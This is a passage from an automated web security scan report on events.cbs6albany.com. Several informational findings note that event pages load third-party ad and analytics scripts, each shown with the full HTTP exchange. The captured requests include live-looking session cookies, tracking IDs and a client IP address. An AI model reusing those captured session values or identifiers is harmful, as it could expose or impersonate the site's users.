Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:34:11 GMT; HttpOnly
Content-Length: 33524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.155. http://events.cbs6albany.com/albany-ny/events/shopping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/shopping

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/shopping HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:35:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 169
ETag: "8b0e18cd7f11736d5f2ce1267057f3c8"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:35:35 GMT; HttpOnly
Content-Length: 16991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.156. http://events.cbs6albany.com/albany-ny/events/show/139733045-pink-floyd-experience previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/139733045-pink-floyd-experience

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/139733045-pink-floyd-experience HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:12 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 112
ETag: "7b0e2dfd3f73d429ae7ec8419c633199"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:12 GMT; HttpOnly
Content-Length: 59841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.157. http://events.cbs6albany.com/albany-ny/events/show/142549185-lisa-lampanelli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/142549185-lisa-lampanelli

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/142549185-lisa-lampanelli HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 94
ETag: "f6e3ba32a247a1ced720795e12c14633"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:11 GMT; HttpOnly
Content-Length: 45711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.158. http://events.cbs6albany.com/albany-ny/events/show/147270025-glenn-beck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/147270025-glenn-beck

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/147270025-glenn-beck HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:12 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 111
ETag: "c997a76163320631f753f84f9de6ec37"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:12 GMT; HttpOnly
Content-Length: 59766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.159. http://events.cbs6albany.com/albany-ny/events/show/148455425-sesame-street-live-elmos-green-thumb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/148455425-sesame-street-live-elmos-green-thumb

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/148455425-sesame-street-live-elmos-green-thumb HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 288
ETag: "e9d92501c809909f4f9073df47012e75"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:13 GMT; HttpOnly
Content-Length: 69370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.160. http://events.cbs6albany.com/albany-ny/events/show/151637365-riverdance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/151637365-riverdance

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/151637365-riverdance HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:14 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 169
ETag: "e2eb2b4905d1880158999453feff7c80"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:14 GMT; HttpOnly
Content-Length: 60444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.161. http://events.cbs6albany.com/albany-ny/events/show/152086945-harlem-globetrotters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/152086945-harlem-globetrotters

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/152086945-harlem-globetrotters HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
